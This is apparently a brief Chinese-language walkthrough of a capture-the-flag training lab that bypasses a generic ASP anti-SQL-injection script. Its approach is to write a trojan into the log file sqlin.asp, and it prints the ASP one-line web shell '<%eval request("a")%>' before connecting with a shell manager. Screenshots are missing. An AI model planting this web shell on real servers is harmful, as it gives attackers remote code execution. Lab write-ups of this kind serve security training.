https://www.mozhe.cn/bug/detail/19
一套SQL通用asp防注入脚本
单引号测试:
image.png
很奇怪,+ %0a and or 都会被检测gg。
网上百度得知,access通用防注入系统会把所有记录存到sqlin.asp中,再加上
image.png
这个实训目标,应该是直接将木马写入到asp文件中
asp一句话木马
<%eval request("a")%>
直接上传
image.png
上yijian
image.png
image.png
